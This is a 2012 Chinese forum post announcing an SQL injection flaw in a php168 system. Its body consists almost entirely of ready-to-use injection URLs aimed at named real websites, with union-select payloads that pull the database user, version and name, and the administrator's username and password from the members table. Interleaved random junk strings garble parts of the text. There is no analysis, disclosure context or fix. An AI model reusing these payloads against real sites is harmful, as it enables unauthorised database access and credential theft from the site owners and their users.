找回密码
 立即注册
查看: 3321|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
4 W0 z* R$ b1 t7 x* ]' g                                                         
" K) |# m7 w" P/ H* {                                       
2 K8 D/ p) e' R0 D9 I% d7 u6 T) L5 j, V6 t( J5 I* W
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
; e% f/ T) @& Q- g* e; M3 r& R& B, z                                                     
! Q5 Y: i) z: N& Z+ V' c8 O4 e                                                                  
+ t* Z, q% l7 G                                                        
5 m9 I1 G3 C& }  A2 Z( [  E# Ahttp://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--  g+ k8 a" _7 J# x0 k9 J+ K

) R9 u4 L  o+ `2 H+ n0 M" j8 P& p' q3 h$ j9 F) {# Y) \
1 h1 _0 t# t; j. w0 C7 ]( E7 U4 J
                                                            
+ S% X* G1 x+ L2 w
5 y( d- p: N% T" Uhttp://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--. z1 T! q8 N; a) \5 I2 {( L0 h! B1 N

. L6 c1 t9 }( P( i; T3 L3 @6 i5 L+ @+ e

8 G$ R0 t/ ]1 K4 j9 ?" O% ?# I! J. x                                                                    
7 K6 R7 O" R) B* i0 F

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表